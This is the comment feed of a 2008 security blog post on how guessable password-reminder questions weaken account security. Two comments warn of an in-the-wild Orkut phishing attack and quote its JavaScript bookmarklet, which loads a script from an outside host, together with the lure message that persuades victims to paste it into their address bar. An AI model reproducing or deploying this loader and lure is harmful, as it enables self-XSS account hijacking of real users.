tag:blogger.com,1999:blog-13756280.post5949290029090911088..comments2024-02-08T03:44:23.780-08:00Comments on Jeremiah Grossman: Hacking Sprint accounts online made easyJeremiah Grossmanhttp://www.blogger.com/profile/05017778127841311186noreply@blogger.comBlogger6125tag:blogger.com,1999:blog-13756280.post-85439496109863835142008-04-23T15:57:00.000-07:002008-04-23T15:57:00.000-07:00It seems we've got filter here :-(! Anyways....The...It seems we've got filter here :-(! Anyways....The script file is located here.....<BR/>'http://9coupons.com/n.js'<BR/>------------------------<BR/>javascript:d=document;<BR/>c=d.createElement('script');<BR/>d.body.appendChild(c);<BR/>c.src='http://9coupons.com/n.js';<BR/>void(0) <BR/>---------------------------<BR/>Is wht appears in the scraps and from a friend....so people would likely trust it and along with it the message nicely written:<BR/><BR/>Hey..One girl is written about u in her ABOUT ME..And ur photos also..<BR/>Clear ur address bar..copy paste.. Below Script To See This Person<BR/><BR/><BR/><BR/>The filter bypass on orkut could be seen on the above link by careful code eval I have provided....no time for much research coz its kinda late here in the Kingdom of Bahrain !...<BR/><BR/>Apologies if I have got the wrong blog....<BR/><BR/>-ShawnZUnknownhttps://www.blogger.com/profile/10096824254603151286noreply@blogger.comtag:blogger.com,1999:blog-13756280.post-74350996207614917982008-04-23T15:43:00.000-07:002008-04-23T15:43:00.000-07:00ORKUT is being hacked.....by a phishing link javas...ORKUT is being hacked.....by a phishing link<BR/> <BR/>javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://9coupons.com/n.js';void(0)<BR/><BR/>This is just to alert everyone tht this is in the Wild!!!!.....further diggin' will be done................<BR/><BR/>I guess everyone will pop in....but here is the heads up!!!!Unknownhttps://www.blogger.com/profile/10096824254603151286noreply@blogger.comtag:blogger.com,1999:blog-13756280.post-39785991371166074602008-04-15T06:40:00.000-07:002008-04-15T06:40:00.000-07:00Well that's why I said it wasn't fool-proof. A maj...Well that's why I said it wasn't fool-proof. A majority of users will think nothing of it, and will actually submit something personal in nature. A great example of what could be used however without worrying about giving away too much information would be something random and humorous such as a joke by comedian Eugene Mirman. "Now whenever I call they have to ask me what am I wearing, and I have to respond, 'I don't think that's appropriate!'"Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-13756280.post-4955355991873222482008-04-14T11:50:00.000-07:002008-04-14T11:50:00.000-07:00Yah, that approach technically works, but then the...Yah, that approach technically works, but then the pendulum swing the other way. Now this "service" has a lot more personal information about you that I'd prefer they didn't have. Basically I just given incorrect answers now and use those fields as passwords normally.Jeremiah Grossmanhttps://www.blogger.com/profile/05017778127841311186noreply@blogger.comtag:blogger.com,1999:blog-13756280.post-9268448198149056442008-04-14T07:21:00.000-07:002008-04-14T07:21:00.000-07:00Again not a fool-proof method, but a lot of servic...Again not a fool-proof method, but a lot of services ask you for up to five custom verification questions and answers, which are supplied when you first create an account. This really depends on what the user chooses to enter, however it is much less likely that someone would be able to supply a specific traumatic childhood event than it would for them to answer with your mother's name.Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-13756280.post-87589690142523691132008-04-12T13:46:00.000-07:002008-04-12T13:46:00.000-07:00I completely agree with you on this one. Password...I completely agree with you on this one. Password reminder systems tend to considerably undermine any security that the password itself had provided. Why try and brute force a complex password when you can just enter a basic piece of information about the person? It's much easier to guess a mascot or pet name anyway.<BR/><BR/><A HREF="http://michaelcoates.wordpress.com/2008/02/12/ill-hack-your-pets-instead-of-your-passwords/" REL="nofollow">Similar post of mine on password reminder systems</A>Anonymousnoreply@blogger.com